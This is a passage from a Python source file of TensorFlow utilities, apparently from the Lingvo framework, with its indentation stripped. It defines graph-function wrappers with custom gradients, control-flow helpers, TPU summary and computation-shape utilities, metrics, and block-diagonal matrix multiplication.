with _SharedRendezvousScope(shared_rendezvous):
return Backward(*args)
backward_cf = BackwardWithSharedRendezvous
@tf.custom_gradient
def ForwardWithGrad(*args):
"""Forward function and its custom gradient."""
# Note that `args` includes implicit captures. This is required by
# tf.custom_gradient so that when the Grad() outputs include gradients to
# implicit captures, they match the inputs to ForwardWithGrad().
#
# However, Forward doesn't take implicit captures as input, so we exclude
# them here.
fwd_args = args[:(len(args) - len(Flatten(res.captured_inputs)))]
op = NestedMap(inputs=args, outputs=Forward(*fwd_args))
def Grad(*args, **kwargs):
"""Gradient function for the forward function.
Args:
*args: Gradients wrt op.outputs.
**kwargs: Additional arguments from tf.custom_gradient.
Returns:
Tuple of derivatives.
"""
if kwargs:
tf.logging.warning(
'Ignoring additional arguments used by tf.custom_gradient: %s',
str(kwargs))
_AssertInputsMatch(op, fwd_sig, res.captured_inputs)
# Ensure dys contains no None.
args = ConvertNoneGradientToZeros(list(op.outputs), list(args))
xs, _ = Pack([fwd_sig, res.captured_inputs], op.inputs)
return backward_cf(*Flatten([xs, op.outputs, args]))
return op.outputs, Grad
res.func = None
forward = lambda *xs: ForwardWithGrad(*Flatten([xs, res.captured_inputs]))
res.call = lambda args=None: Call(forward, args)
return res
# Global variable to control whether to use tf.function.
# If not set, the result is determined by tf2 status. See _UseTfFunction for
# details.
# TODO(laigd): remove after b/169869929 is fixed.
_USE_TF_FUNCTION = ThreadLocalStack()
# Constants for propagating framework tensors through Function.
_FRAMEWORK_TENSOR_GLOBAL_STEP = '_global_step'
@contextlib.contextmanager
def TfFunctionScope(use_tf_function=True):
_USE_TF_FUNCTION.stack.append(use_tf_function)
try:
yield
finally:
_USE_TF_FUNCTION.stack.pop()
def _UseTfFunction():
"""Whether to use tf.function instead of tf.Defun."""
if _USE_TF_FUNCTION.stack:
return _USE_TF_FUNCTION.stack[-1]
return tf2_enabled()
class Function(object):
"""Function builds a TensorFlow graph function from a callable.
In the high level this is similar to tf.Defun and tf.function. In fact this
relies on those as underlying implementations, but with specific configuration
so it's easier to use and can work well in some extreme cases in Lingvo.
Example usage:
- No inputs:
>>> @Function()
... def foo():
... return tf.constant(1.0)
>>> y = foo()
- Scalar input:
>>> @Function(fwd_sig=tf.TensorSpec(None, tf.float32))
... def foo(x):
... return x * 2
>>> y = foo(1.0)
- List input:
>>> @Function(fwd_sig=[tf.TensorSpec(None, tf.float32) for _ in range(2)])
... def foo(xs):
... return xs[0] + xs[1]
>>> y = foo([1.0, 2.0])
- Nested input:
>>> @Function(fwd_sig=NestedMap(x=tf.TensorSpec(None, tf.float32)))
... def foo(nmap):
... return nmap.x * 2
>>> y = foo(NestedMap(x=1.0))
- With custom gradient function (other input types mentioned above are also
supported):
>>> def bar(x, y, dy):
... del y, dy
... return 4.0 * x * dy
>>>
>>> @Function(fwd_sig=tf.TensorSpec(None, tf.float32), bak=bar)
... def foo(x):
... return 2.0 * x * x
- Used in control flow ops:
>>> then_branch = Function(tf.TensorSpec([], tf.int32))(lambda x: x / 2)
>>> else_branch = Function(tf.TensorSpec([], tf.int32))(lambda x: 3 * x + 1)
>>> y = tf.If(cond, inputs, then_branch.func, else_branch.func)
"""
# TODO(laigd): the use_tf_function option is added for backward compatibility
# reasons. Remove it after the migration.
def __init__(self,
fwd_sig=None,
bak=None,
bak_as_function=False,
device=None,
use_tf_function=None):
"""Constructor.
Below we assume `fwd` is the input to `__call__` that is used to build the
TensorFlow graph function encapsulated by this object.
Args:
fwd_sig: A Nested Structure of tf.TensorSpec representing the input
signature of `fwd`, or None (meaning that `fwd` takes no inputs). The
actual inputs should be compatible with this (have same shapes and
dtypes).
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for `fwd`. bak needs to return
dcapture if `fwd` uses any implicitly captured tensors, whose gradients
are dcapture.
bak_as_function: Whether to create a TF graph function for `bak`.
device: The device on which to run `fwd` and `bak`. Defaults to the
current device.
use_tf_function: Whether use tf.function. Defaults to _UseTfFunction().
"""
self._fwd_sig = fwd_sig
self._bak = bak
self._bak_as_function = bak_as_function
self._device = device
self._use_tf_function = use_tf_function
def __call__(self, fwd):
"""Creates a graph function.
Args:
fwd: a callable xs: Nested Structure -> ys: Nested Structure.
Returns:
A DefinedFunction object encapsulating `fwd` as a graph function.
"""
assert callable(fwd)
return DefinedFunction(fwd, self._fwd_sig, self._bak, self._bak_as_function,
self._device, self._use_tf_function)
class DefinedFunction(object):
"""Encapsulates a TensorFlow graph function and its properties."""
def __init__(self,
fwd,
fwd_sig=None,
bak=None,
bak_as_function=False,
device=None,
use_tf_function=None):
"""Constructor.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure. Used to
build the TensorFlow graph function that this object encapsulates.
fwd_sig: A Nested Structure of tf.TensorSpec representing the input
signature of `fwd`, or None (meaning that `fwd` takes no inputs). The
actual inputs should be compatible with this (have same shapes and
dtypes).
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for `fwd`. bak needs to return
dcapture if `fwd` uses any implicitly captured tensors, whose gradients
are dcapture.
bak_as_function: Whether to create a TF graph function for `bak`.
device: The device on which to run `fwd` and `bak`. Defaults to the
current device.
use_tf_function: Whether use tf.function. Defaults to _UseTfFunction().
"""
self._fwd_sig = fwd_sig
wrapped_fwd_sig = fwd_sig
fwd_fn = fwd
bak_fn = bak
graph_random_seed = None
if tf.get_default_graph().seed is not None:
graph_random_seed = tf.get_default_graph().seed
# Wrap the forward function to propagate framework tensors like step_seed
# and global_step.
wrapped_fwd_sig = NestedMap()
self._added_global_step = False
if GetGlobalStep() is not None:
wrapped_fwd_sig[_FRAMEWORK_TENSOR_GLOBAL_STEP] = (
tf.TensorSpec([], tf.int64))
self._added_global_step = True
if fwd_sig is not None:
wrapped_fwd_sig.inputs = fwd_sig
elif not wrapped_fwd_sig:
wrapped_fwd_sig = None
def ForwardWrapped(wrapped_inputs=None):
if graph_random_seed is not None:
tf.random.set_seed(graph_random_seed)
global_step = None
if wrapped_inputs:
assert isinstance(wrapped_inputs, NestedMap)
global_step = wrapped_inputs.get(_FRAMEWORK_TENSOR_GLOBAL_STEP, None)
with GlobalStepContext(global_step):
if wrapped_inputs and 'inputs' in wrapped_inputs:
result = fwd(wrapped_inputs.inputs)
else:
result = fwd()
return result
fwd_fn = ForwardWrapped
if bak:
# Wrap the backward function to return zero gradients for framework
# tensors like step_seed and global_step.
def BackwardWrapped(wrapped_xs, ys, dys):
if graph_random_seed is not None:
tf.random.set_seed(graph_random_seed)
with GlobalStepContext(
wrapped_xs.get(_FRAMEWORK_TENSOR_GLOBAL_STEP, None)):
result = bak(wrapped_xs.inputs, ys, dys)
dxs = Transform(tf.zeros_like, wrapped_xs)
if isinstance(result, tuple) and len(result) == 2:
dxs.inputs, dcapture = result
return dxs, dcapture
else:
dxs.inputs = result
return dxs
bak_fn = BackwardWrapped
if use_tf_function is None:
use_tf_function = _UseTfFunction()
fn = _DefineFunction if use_tf_function else _DefineDefun
self._data = fn(
fwd=fwd_fn,
fwd_sig=wrapped_fwd_sig,
bak=bak_fn,
bak_as_function=bak_as_function,
device=device)
def __call__(self, args=None):
"""Invokes the graph function.
Args:
args: the inputs to the graph function, must be compatible with `fwd_sig`.
Returns:
The output tensors with the same structure as the output of `fwd`,
returned by a call to the graph function.
"""
assert IsCompatible(args,
self._fwd_sig), '{} vs {}'.format(args, self._fwd_sig)
return self._data.call(self.AddFrameworkInputs(args))
@property
def func(self):
"""The underlying TensorFlow graph function that this object encapsulates.
The returned graph function is created by tracing `fwd` during construction.
If not None, it will be a _DefinedFunction or ConcreteFunction that takes
flat inputs and returns flat outputs, and can be used by routines that
require a TensorFlow function object (e.g. tf.If, tf.While, etc).
If no backprop function is provided during construction, the result is
always not None.
"""
return self._data.func
def AddFrameworkInputs(self, inputs):
"""Add framework tensors like step_seed and global_step to inputs.
This is only necessary when using `func`, as wrapping is handled
automatically in __call__.
Args:
inputs: inputs to the function.
Returns:
Inputs wrapped with framework tensors suitable for use with `func`.
"""
result = NestedMap()
if self._added_global_step:
global_step = GetGlobalStep()
assert global_step is not None
result[_FRAMEWORK_TENSOR_GLOBAL_STEP] = tf.cast(global_step, tf.int64)
if inputs is not None:
result.inputs = inputs
return result if result else None
@property
def output_dtypes(self):
"""Output dtypes of the graph function.
The result will have the same structure as the outputs of `fwd` but contain
the corresponding output dtypes.
"""
return Transform(lambda x: x.dtype, self._data.outputs)
@property
def stateful_ops(self):
"""Stateful ops used by `fwd`, as a list of (op_name, op_type) tuples."""
return self._data.stateful_ops
@property
def captured_inputs(self):
"""Implicit input tensors captured by `fwd`."""
return self._data.captured_inputs
def CallDefun(fwd, args=None, bak=None, bak_as_function=False, device=None):
"""Wraps fwd in a defun with custom gradient bak and calls it with args.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
args: A Nested Structure of tf.Tensor or None.
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for fwd. bak needs to return
dcapture if fwd uses any implicitly captured tensors, whose gradients are
dcapture.
bak_as_function: Whether to create a TF graph function for bak.
device: the device on which to run fwd and bak.
Returns:
A Nested Structure equivalent to what fwd(args) computes.
"""
if args is not None:
args = Transform(tf.convert_to_tensor, args)
sigs = Function(
fwd_sig=TensorSpecs(args),
bak=bak,
bak_as_function=bak_as_function,
device=device)(
fwd=fwd)
if args is None:
return sigs()
else:
return sigs(args)
def If(cond, inputs, then_branch, else_branch):
"""Helper to construct an if/else statement.
Args:
cond: A scalar `Tensor` that can be converted to boolean.
inputs: A flattenable representing the input tensors of the if/else
statement. Can be None to represent no inputs.
then_branch: A callable 'inputs' -> flattenable. The returned value should
be compatible with what 'else_branch' returns.
else_branch: A callable 'inputs' -> flattenable. The returned value should
be compatible with what 'then_branch' returns.
Returns:
Output returned by the call to either 'then_branch' or 'else_branch'.
"""
fwd_sig = TensorSpecs(inputs)
then_sigs = Function(fwd_sig=fwd_sig)(fwd=then_branch)
else_sigs = Function(fwd_sig=fwd_sig)(fwd=else_branch)
assert IsCompatible(then_sigs.output_dtypes, else_sigs.output_dtypes), (
'Outputs of then_branch and else_branch are not compatible: {} vs {}'
.format(then_sigs.output_dtypes, else_sigs.output_dtypes))
if then_sigs.captured_inputs != else_sigs.captured_inputs:
raise ValueError('Differing captured inputs in then and else. '
'Ensure the same tensors are captured in the same order.')
ret = tf.If(
cond=cond,
inputs=Flatten(then_sigs.AddFrameworkInputs(inputs)) +
then_sigs.captured_inputs,
then_branch=then_sigs.func,
else_branch=else_sigs.func)
return Pack(then_sigs.output_dtypes, ret)
def _Itype():
"""Loop iterator data type."""
return tf.int32 if use_xla() else tf.int64
def WhileLoop(cond, body, loop_state):
"""Helper to construct a while loop.
Args:
cond: A callable NestedMap -> tf.bool.
body: A callable NestedMap -> NestedMap.
loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
loop state.
Returns:
The final loop state in the same structure as loop_state.
"""
fwd_sig = TensorSpecs(loop_state)
cond_sigs = Function(fwd_sig=fwd_sig)(fwd=cond)
def BodyWrapped(loop_state):
result = body(loop_state)
# loop_state is augmented with global tensors inside of DefinedFunction.
# WhileLoop needs to return the same structure as the inputs, so we augment
# the return value here to match.
result = cond_sigs.AddFrameworkInputs(result)
return result
body_sigs = Function(fwd_sig=fwd_sig)(fwd=BodyWrapped)
wrapped_inputs = body_sigs.AddFrameworkInputs(loop_state)
new_state = tf.While(
Flatten(wrapped_inputs), cond=cond_sigs.func, body=body_sigs.func)
# The functional `While` used above does not have a registered gradient.
# This was not a problem in Graph mode, however in Eager mode,
# GradientTape will attempt to call the gradient of the While op in the
# forward pass. `stop_gradient` is used to pretend the op is a constant
# in the forward pass. This also avoids calling the gradient of other ops in
# `While` in the forward pass.
# Details in https://www.tensorflow.org/api_docs/python/tf/custom_gradient.
# Guarded by 'IsEagerMode' to limit impact.
if IsEagerMode():
new_state = [tf.stop_gradient(t) for t in new_state]
return Pack(wrapped_inputs, new_state).inputs
def ForLoop(body, start, limit, delta, loop_state):
"""Helper to construct a for loop.
Args:
body: A callable (tf.int, NestedMap) -> NestedMap.
start: Loop variable's initial value.
limit: Loop variable's limit value.
delta: Loop variable's change per iteration.
loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
loop state.
Returns:
The final loop state in the same structure as loop_state.
"""
state = NestedMap(
iter=tf.cast(start, _Itype()),
limit=tf.cast(limit, _Itype()),
delta=tf.cast(delta, _Itype()),
loop_state=loop_state)
def LoopCond(state):
return tf.less(state.iter, state.limit)
def LoopBody(state):
state.loop_state = body(state.iter, state.loop_state)
state.iter = tf.add(state.iter, state.delta)
return state
return WhileLoop(LoopCond, LoopBody, state).loop_state
def TopK(x_in, k):
"""Equivalent to tf.math.top_k(x_in, k) but more efficient on tpu."""
assert k <= 2, 'This implementation is only efficient for small k.'
# TODO(yonghui): Try out an alternative idea where we first reshape x_in as a
# 2d tensor, then call tf.math.top_k, and then reshape back.
x_in_shape = x_in.shape
x_rank = x_in_shape.rank
assert x_rank and x_in_shape.as_list()[x_rank - 1] > 0
last_dim_size = x_in_shape.as_list()[x_rank - 1]
min_value = tf.math.reduce_min(x_in) - 1.0
out_indices = []
out_values = []
for unused_i in range(k):
index_i = tf.math.argmax(x_in, axis=-1, output_type=tf.int32)
mask_i = tf.one_hot(index_i, last_dim_size)
# TODO(yonghui): Would tf.gather be more efficient and numerically stable
# here?
value_i = tf.reduce_sum(mask_i * x_in, -1, keepdims=True)
x_in = (1.0 - mask_i) * x_in + mask_i * min_value
out_indices.append(tf.expand_dims(index_i, -1))
out_values.append(value_i)
if k == 1:
return out_values[0], out_indices[0]
else:
return tf.concat(out_values, x_rank - 1), tf.concat(out_indices, x_rank - 1)
def ReadVariable(var_op):
"""Returns the value of the given variable operation.
Args:
var_op: the `Operation` object for a VarHandleOp.
Raises:
TypeError: if var_op is not a VarHandleOp.
Returns:
A `Tensor` containing the value of the variable.
"""
if var_op.type != 'VarHandleOp':
raise TypeError('var_op should be a VarHandleOp, got %s' % str(var_op.type))
# Filter out the ReadVariableOps that have control dependencies to avoid
# side-effects when the user runs it.
filter_fn = lambda op: op.type == 'ReadVariableOp' and not op.control_inputs
var_readers = list(filter(filter_fn, var_op.outputs[0].consumers()))
assert var_readers
return var_readers[0].outputs[0]
_TPU_SUMMARY_TENSORS_KEY = ('__lingvo_tpu_summary_tensors')
_TPU_SUMMARY_CONTEXTS = ThreadLocalStack()
def _GetTpuSummaryTensor():
if _TPU_SUMMARY_CONTEXTS.stack:
return _TPU_SUMMARY_CONTEXTS.stack[-1]
return _CollectionGetter(_TPU_SUMMARY_TENSORS_KEY, lambda: [])()
@contextlib.contextmanager
def TpuSummaryTensorContext():
"""Creates a context where AddTpuSummaryTensor() will add tensors."""
_TPU_SUMMARY_CONTEXTS.stack.append([])
try:
yield
finally:
_TPU_SUMMARY_CONTEXTS.stack.pop()
def AddTpuSummaryTensor(name, value, weight=1.0):
"""Adds tensor to global collection of summaries, or a local context if any.
This needs to be used in situations where tf.summary() could be used but
currently tf.summary is not supported. Use py_utils.AddTpuSummaryTensor() in
low level code to add summary tensors to global collection of summaries.
Then recover all summary tensors from global collection by calling
py_utils.GetTpuSummaryTensors() from top level code (for example from
ComputeLoss method of BaseTask).
In addition to 'name' argument, current tensorflow name scope is also
captured and added to the metric name. This way for example summaries from
a repeated layer will appear as separate graphs in the tensorboard.
Weight argument is optional and defaults to 1.0. See BaseTask.ComputeLoss for
the exact definition of weight for eval metrics.
Args:
name: metric name
value: metric value tensor
weight: weight tensor for weighted metrics
"""
tpu_summary_tensors = _GetTpuSummaryTensor()
x = NestedMap()
x.name = name
x.value = value, tf.convert_to_tensor(weight)
x.name_scope = tf.get_default_graph().get_name_scope()
tpu_summary_tensors.append(x)
def GetTpuSummaryTensors():
"""Returns summary tensors from global collection.
Returns:
A dict containing str keys and (metric, weight) pairs as values
"""
tpu_summary_tensors = _GetTpuSummaryTensor()
return {
'%s/%s' % (x.name, SanitizeScopeKey(x.name_scope)): x.value
for x in tpu_summary_tensors
}
def ClearTpuSummaryTensors():
tpu_summary_tensors = _GetTpuSummaryTensor()
del tpu_summary_tensors[:]
def ComputationShape(split_size, topology=None):
"""Decides the computation shape based on the split_size.
Args:
split_size: number of accelerators to use per split.
topology: a serialized string of `tensorflow.tpu.TopologyProto`, or a
`tf.tpu.experimental.Topology` object, that describes the TPU cluster
topology. If not set, it'll use a default setting based on split_size.
Returns:
A 4-element list that describes the computation shape.
"""
if topology:
if isinstance(topology, tf.tpu.experimental.Topology):
topology_info = topology
else:
topology_info = tf_topology.Topology(serialized=topology)
computation_shape = None
if topology and functools.reduce(lambda a, b: a * b,
topology_info.mesh_shape) == split_size:
computation_shape = topology_info.mesh_shape
elif split_size == 1:
computation_shape = [1, 1, 1, 1]
elif topology and topology_info.mesh_shape[
-1] == 1 and split_size in topology_info.mesh_shape:
# For Megacore, if we find exact match on mesh shape, map split_size to it
computation_shape = [1, 1, 1, 1]
computation_shape[topology_info.mesh_shape.tolist().index(
split_size)] = split_size
else:
if topology:
cores_per_chip = topology_info.mesh_shape[-1]
else:
cores_per_chip = 2
assert split_size % cores_per_chip == 0
split_chips = split_size // cores_per_chip
if split_chips == 1:
computation_shape = [1, 1, 1, cores_per_chip]
elif split_chips == 2:
computation_shape = [1, 2, 1, cores_per_chip]
elif split_chips == 4:
computation_shape = [2, 2, 1, cores_per_chip]
elif split_chips == 8:
computation_shape = [4, 2, 1, cores_per_chip]
elif split_chips == 12:
computation_shape = [1, 1, 12, cores_per_chip]
elif split_chips == 16:
computation_shape = [4, 4, 1, cores_per_chip]
elif split_chips == 24:
computation_shape = [1, 2, 12, cores_per_chip]
elif split_chips == 32:
if topology and topology_info.mesh_shape[1] == 32:
# Fwd within-replica all-reduces is performed along column;
# Bwd gradient cross-replica all-reduces is performed along row.
# This currently has better performance than the strided patten.
computation_shape = [1, 32, 1, cores_per_chip]
else:
computation_shape = [4, 8, 1, cores_per_chip]
elif split_chips == 64:
computation_shape = [8, 8, 1, cores_per_chip]
elif split_chips == 128:
computation_shape = [8, 16, 1, cores_per_chip]
elif split_chips == 256:
computation_shape = [16, 16, 1, cores_per_chip]
elif split_chips == 512:
computation_shape = [16, 32, 1, cores_per_chip]
elif split_chips == 1024:
computation_shape = [32, 32, 1, cores_per_chip]
elif split_chips == 2048:
computation_shape = [64, 32, 1, cores_per_chip]
elif split_chips == 4096:
computation_shape = [128, 32, 1, cores_per_chip]
else:
assert False, ('Model parallelism with %d devices is currently not'
' supported.' % split_size)
assert computation_shape is not None
return computation_shape
def GetExtraVars():
"""Returns the captured variables by the function."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.variable_captures
return function.get_extra_vars()
def GetExtraInputs():
"""Returns the captured input tensors by the function."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.external_captures
return function.get_extra_inputs()
def GetExtraArgs():
"""Returns the corresponding function arguments for the captured inputs."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.internal_captures
return function.get_extra_args()
def ShardedFilePatternToGlob(file_pattern):
"""Converts a file pattern path@shards to path-?????-of-shards."""
if ',' in file_pattern:
raise ValueError(
'ShardedFilePatternToGlob does not support multiple file patterns.')
if '@' not in file_pattern:
return file_pattern
path, shards = file_pattern.split('@')
if shards == '*':
return f'{path}-?????-of-*'
return f'{path}-?????-of-{int(shards):05}'
def ComputeNceAndAuc(probs, targets, mask):
"""Compute normalized cross entropy and AUC of the PR curve for a batch.
Args:
probs: a tensor of shape [batch, time].
targets: a tensor of shape [batch, time], where each element is either 0 or
1 indicating wrong or correct.
mask: a tensor of shape [batch, time], a mask for hyp sequence.
Returns:
nce: a tensor of shape [1], the normalized cross entropy value.
auc: a tensor of shape [1], the AUC value.
"""
def LogWithClip(tensor, clip_value_min=1e-8):
"""Clip all elements of a tensor to a minimum before taking log."""
return tf.math.log(tf.clip_by_value(tensor, clip_value_min, 1.0))
bce = -targets * LogWithClip(probs) - (1 - targets) * LogWithClip(1 - probs)
num_cor = tf.reduce_sum(targets * mask)
num_tokens = tf.reduce_sum(mask)
wcr = num_cor / num_tokens
entropy = -wcr * LogWithClip(wcr) - (1 - wcr) * LogWithClip(1 - wcr)
avg_conditional_entropy = tf.reduce_mean(tf.boolean_mask(bce, mask))
nce = (entropy - avg_conditional_entropy) / entropy
auc = tf.metrics.auc(targets, probs, mask, curve='PR')[1]
return nce, auc
def GatherTensorValuesBySeqIndices(tensor, class_indices, keepdims=False):
"""Gather values from a 3d tensor according to sequences of indices.
Args:
tensor: a 3d tensor of [dim0, dim1, num_class], e.g. output from softmax.
class_indices: a 2d tensor of [dim0, dim1], where the second dim is a
sequence of class indices between 0 to num_class - 1, inclusive.
keepdims: bool, expand the last dimension of the returned tensor if True.
Returns:
A tensor ret of [dim0, dim1], where
ret[b, t] = tensor[b, t, indices[b, t]].
If keepdims is True, then ret has shape [dim0, dim1, 1].
"""
tensor = HasRank(tensor, 3)
class_indices = HasRank(class_indices, 2)
tensor = HasShape(tensor, GetShape(class_indices), 2)
dim0 = GetShape(class_indices)[0]
dim1 = GetShape(class_indices)[1]
dim0_indices = tf.tile(tf.expand_dims(tf.range(dim0), axis=-1), [1, dim1])
dim1_indices = tf.tile(tf.expand_dims(tf.range(dim1), axis=0), [dim0, 1])
gather_indices = tf.stack([
tf.cast(dim0_indices, dtype=class_indices.dtype),
tf.cast(dim1_indices, dtype=class_indices.dtype), class_indices
],
axis=-1)
ret = tf.gather_nd(tensor, gather_indices)
if keepdims:
ret = tf.expand_dims(ret, axis=-1)
return ret
def GetSoftmaxProbsBySeqIndices(logits, indices, keepdims=False):
"""Get softmax probabilities from index sequences given logits sequences.
Args:
logits: a tensor of [batch, time, num_class] or [time, batch, num_class].
indices: a tensor of [batch, time] or [time, batch].
keepdims: bool, expand the last dimension of the returned tensor if True.
Returns:
a tensor of [batch, time] or [time, batch] for the corresponding softmax
probabilities. If keepdims is True, returned tensor has a third dimension
of size 1.
"""
probs = tf.nn.softmax(logits)
return GatherTensorValuesBySeqIndices(probs, indices, keepdims)
def DivideNoNan(x, y):
"""Equivalent to tf.math.divide_no_nan but supports bfloat16."""
safe_y = tf.where(tf.equal(y, 0.), tf.ones_like(y), y)
return tf.where(tf.equal(y, 0.0), tf.zeros_like(x), x / safe_y)
def SequencePaddings(seqlen, maxlen=None):
mask = tf.sequence_mask(seqlen, maxlen, dtype=tf.float32)
return 1 - mask
def AppendDims(x, ndims):
return tf.reshape(x, GetShape(x) + [1] * ndims)
def MaybeSoftCapLogits(x, cap=0.0):
"""Caps logits x to be within a certain range.
Args:
x: A float tensor, the logit values to be capped.
cap: a float, the limit to cap x within. If cap <= 0.0, x is not capped.
Returns:
logits after capping.
"""
if cap <= 0.0:
return x
else:
return cap * tf.math.tanh(x / cap)
def GetTpuEmbeddingGraphCollection():
"""Return the graph collection that stores the TpuEmbeddingCollection."""
tpu_emb_graph_collection = tf.get_collection_ref('__tpu_embedding_collection')
assert len(tpu_emb_graph_collection) <= 1
return tpu_emb_graph_collection
class AuxLossContext:
"""Context that holds a list of aux-losses.
By default it is non-reentrant, but can be specified as reentrant explicitly
when creating an inner context.
"""
_global_stack = []
@classmethod
def Current(cls):
"""Returns current context or None."""
if cls._global_stack:
return cls._global_stack[-1]
else:
return None
def __init__(self, reentrant=False):
self.aux_loss_tensors = []
self._reentrant = reentrant
def AddLoss(self, loss):
self.aux_loss_tensors.append(loss)
@property
def aux_losses(self):
return self.aux_loss_tensors
def __enter__(self):
if not self._reentrant:
assert not self._global_stack, 'no re-entry'
self._global_stack.append(self)
return self
def __exit__(self, *args):
self._global_stack.pop()
def GetTrainableVariables(scope, bprop_variable_filter,
bprop_variable_exclusion, vmap):
"""Returns trainable vars.
Args:
scope: A Python str.
bprop_variable_filter: see BaseTask.Params().bprop_variable_filter.
bprop_variable_exclusion: see BaseTask.Params().bprop_variable_exclusion.
vmap: A NestedMap of var_path(str) -> tf Variable.
Returns:
A filtered NestedMap of var_path(str) -> trainable tf Variable.
"""
pos = re.compile(bprop_variable_filter) if bprop_variable_filter else None
neg = re.compile(
bprop_variable_exclusion) if bprop_variable_exclusion else None
def VariableFilter(v):
"""Returns True if variable v should be optimized by this learner."""
if not v.trainable:
return False
if pos and not pos.search(v.name):
tf.logging.info('%s: disabled by bprop_variable_filter: %s', scope,
v.name)
return False
if neg and neg.search(v.name):
tf.logging.info('%s: disabled by bprop_variable_exclusion: %s', scope,
v.name)
return False
return True
return vmap.Filter(VariableFilter)
def BlockDiagonalMatmul(inputs, w, input_num_blocks):
"""Block diagonal matmul.
Args:
inputs: a tf.Tensor with the last dimension being the dimension for matmul.
w: an order-3 tf.Tensor of shape (input_num_blocks, input_dim //
input_num_blocks, output_dim // input_num_blocks)
input_num_blocks: an int specifying number of blocks for the input.
Returns:
A tf.Tensor of shape: inputs.shape[:-1] + [w.shape[-1]].
"""
input_splitted = tf.split(inputs, input_num_blocks, axis=-1)
output_splitted = []
for i, input_i in enumerate(input_splitted):
output_splitted.append(tf.matmul(input_i, w[i, :, :]))
return tf.concat(output_splitted, axis=-1)
def BlockDiagonalMatmulWithMix(inputs, w, mix_kernel, input_num_blocks):
"""Block diagonal matmul with mix.
With mix, the results from the blocked matmul are (linearly) mixed with
trainable weights in mix_kernel.
Args:
inputs: a tf.Tensor with the last dimension being the dimension for matmul.
w: an order-3 tf.Tensor of shape (input_num_blocks, input_dim //
input_num_blocks, output_dim // input_num_blocks).
mix_kernel: an order-2 tf.Tensor of shape (input_num_blocks,
input_num_blocks).
input_num_blocks: an int specifying number of blocks for the input.
Returns:
A tf.Tensor of shape: inputs.shape[:-1] + [w.shape[-1]].
"""
input_splitted = tf.split(inputs, input_num_blocks, axis=-1)
output_splitted = []
for i, input_i in enumerate(input_splitted):
output_splitted.append(tf.matmul(input_i, w[i, :, :]))
output_mixed = [0.0] * input_num_blocks
for i in range(input_num_blocks):
for j in range(input_num_blocks):
output_mixed[i] += mix_kernel[i, j] * output_splitted[j]
output_splitted = output_mixed
return tf.concat(output_splitted, axis=-1)
def BlockDiagonalProjectLastDim(inputs,
weight,
input_dim,
output_dim,
num_blocks=1):
"""Block diagonal linear projection on the last dim of the input tensor.
This is a TPU efficient implementation to avoid reshaping inputs to Rank-2
tensor by using Einsum for the compute.
Args:
inputs: An input Tensor, the last dimension of which is input_dim.
weight: A weight matrix with shape [input_dim, output_dim].
input_dim: An integer or a symbolic dim, the last dimension of the inputs.
output_dim: An integer or a symbolic dim, the last dimension of the outputs.
num_blocks: An integer or a symbolic dim, the number of blocks.
Returns:
An output Tensor of the same rank as inputs, the last dimension is
output_dim.
"""
input_dim = int(
symbolic.ToStatic(input_dim) if symbolic.IsExpr(input_dim) else input_dim)
output_dim = int(
symbolic.ToStatic(output_dim) if symbolic.IsExpr(output_dim
) else output_dim)
# Assert input_dim and output_dim
inputs = with_dependencies([assert_equal(GetShape(inputs)[-1], input_dim)],
inputs)
weight = with_dependencies([
assert_equal(GetShape(weight)[0], num_blocks),
assert_equal(GetShape(weight)[1], input_dim // num_blocks),
assert_equal(GetShape(weight)[-1], output_dim // num_blocks)
], weight)
if (use_tpu() and inputs.shape is not None and
inputs.shape.rank is not None and inputs.shape.rank < 26):
# Avoids reshape if feasible and uses Einsum.
if inputs.shape.rank == 2:
# outputs = tf.matmul(inputs, weight)
outputs = BlockDiagonalMatmul(inputs, weight, num_blocks)
else:
# This is equivalent to:
# outputs = tf.einsum('...y,yz->...z', inputs, weight)
# Unfortunately ... in einsum() leads to extra HBM usage.
s = ''.join([chr(x) for x in range(97, 123)]) # abc...xyz
r = inputs.shape.rank
input_splitted = tf.split(inputs, num_blocks, axis=-1)
output_splitted = []
for i, input_i in enumerate(input_splitted):
output_splitted.append(
tf.einsum('{0}y,yz->{0}z'.format(s[:r - 1]), input_i,
weight[i, :, :]))
outputs = tf.concat(output_splitted, axis=-1)
else:
outputs = BlockDiagonalMatmul(
tf.reshape(inputs, ToStaticShape([-1, input_dim])), weight, num_blocks)
outputs = tf.reshape(
outputs,
tf.concat([
tf.cast(GetShape(inputs)[:-1], tf.int32),
ToStaticShape([output_dim])
],
axis=0))
return outputs
def BlockDiagonalProjectLastDimWithMix(inputs,
weight,
input_dim,
output_dim,
mix_kernel,
num_blocks=1):
"""Block diagonal linear projection on the last dim with mix.
This is a TPU efficient implementation to avoid reshaping inputs to Rank-2
tensor by using Einsum for the compute.
Args:
inputs: An input Tensor, the last dimension of which is input_dim.
weight: A weight matrix with shape [input_dim, output_dim].
input_dim: An integer or a symbolic dim, the last dimension of the inputs.
output_dim: An integer or a symbolic dim, the last dimension of the outputs.
mix_kernel: an order-2 tf.Tensor of shape (num_blocks, num_blocks).
num_blocks: An integer or a symbolic dim, the number of blocks.
Returns:
An output Tensor of the same rank as inputs, the last dimension is
output_dim.
"""
input_dim = int(
symbolic.ToStatic(input_dim) if symbolic.IsExpr(input_dim) else input_dim)
output_dim = int(
symbolic.ToStatic(output_dim) if symbolic.IsExpr(output_dim
) else output_dim)
# Assert input_dim and output_dim
inputs = with_dependencies([assert_equal(GetShape(inputs)[-1], input_dim)],
inputs)
weight = with_dependencies([
assert_equal(GetShape(weight)[0], num_blocks),
assert_equal(GetShape(weight)[1], input_dim // num_blocks),
assert_equal(GetShape(weight)[-1], output_dim // num_blocks)
], weight)
if (use_tpu() and inputs.shape is not None and
inputs.shape.rank is not None and inputs.shape.rank < 26):
# Avoids reshape if feasible and uses Einsum.
if inputs.shape.rank == 2:
outputs = BlockDiagonalMatmulWithMix(inputs, weight, mix_kernel,
num_blocks)
else:
# This is equivalent to:
